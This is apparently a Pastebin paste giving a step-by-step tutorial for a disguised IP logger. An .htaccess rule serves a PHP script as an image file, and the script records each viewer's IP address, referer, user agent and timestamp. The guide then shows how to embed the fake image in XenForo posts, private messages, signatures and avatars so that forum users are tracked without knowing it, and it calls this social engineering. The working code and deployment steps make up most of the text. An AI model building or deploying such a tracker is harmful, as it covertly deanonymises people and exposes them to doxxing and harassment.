Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Xenforo vulnerability to get visitor's IP being external user not sysadmin.
- READ THIS TUTORIAL MADE BY TTG_POPEYES
- Or.. just use grabify.. (https://grabify.link/image)
- Step 1.)
- Find a free webhost you can use.
- The one I use is FreeHostia.com
- Just register for a free account there.
- --
- Step 2.)
- Make a new web directory
- example: [ Register or Signin to view external links. ]
- --
- Step 3.)
- Create a new file named:
- .htaccess
- --
- Step 4.)
- Put this code in .htaccess
- Code:
- RewriteEngine on
- RewriteRule ^image.gif$ iplogger.php
- Where it says: image.gif
- You can change it to where you`ve uploaded your image, it doesn`t matter what image and it can be in any image type such as: gif, jpeg, png, etc.
- Where it says: iplogger.php
- That is the PHP file that will have the Ip logging code, whatever you want to name it.
- --
- Step 5.)
- Create an empty iplogger.php file (or whatever you named it)
- And put in this code:
- Code:
- <?php
- $log = 'logger.html';
- $ip = $_SERVER['REMOTE_ADDR'];
- $page = $_SERVER['REQUEST_URI'];
- $refer = $_SERVER['HTTP_REFERER'];
- $date_time = date("l j F Y g:ia", time() - date("Z")) ;
- $agent = $_SERVER['HTTP_USER_AGENT'];
- $fp = fopen("logger.html", "a");
- fputs($fp, "
- <b>$date_time</b> <br> <b>IP: </b>$ip<br><b>Page: </b>$page<br><b>Refer: </b>$refer<br><b>Useragent:
- </b>$agent <br><br>
- ");
- flock($fp, 3);
- fclose($fp);
- ?>
- Then create an Empty:
- logger.html file
- --
- Step 6.)
- Upload your image.gif file (or whatever you named it)
- if you haven`t already
- --
- Step 7.)
- Go to a forum or wherever you would like
- And insert the image using:
- Code:
- [ Register or Signin to view external links. ]
- You can insert this in:
- - Pm`s
- - Posts & Threads
- - Signatures
- - Avatars
- -And anything else that allows external linking of images.
- If you would like to insert your image using HTML where is allowed then use this code:
- Code:
- <IMG SRC="http://site.com/directory/image.gif">
- --
- Step 8.)
- Check your: [ Register or Signin to view external links. ]
- For all your IP logs including where they came from.
- --
- How it WORKS:
- Basically,
- When the web tries to access the Image that is in the directory with the .htaccess file.
- The image.gif displays iplogger.php
- Step 9.)
- Insert this url inside a post in xenforo using IMAGE BY URL (https://m.imgur.com/a/t91Qba7)
- And wait for people to enter, it's more social engineering than anything, using a website's reputation to obtain ips.
- ~ GhostyCeh
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement